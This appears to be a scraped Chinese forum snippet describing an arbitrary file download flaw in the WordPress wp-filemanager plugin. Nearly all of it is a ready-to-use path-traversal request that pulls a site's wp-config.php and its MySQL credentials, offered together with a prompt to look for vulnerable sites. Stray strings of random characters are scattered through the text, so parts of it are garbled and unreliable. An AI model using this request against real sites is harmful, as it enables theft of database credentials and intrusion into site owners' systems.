洞详解:http://packetstormsecurity.com/f ... -File-Download.html # G8 D1 q; O( H. |# r h E0 i # ]( i x9 u9 s7 _8 M( e" N查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。7 r+ u9 [$ B( Z5 m) f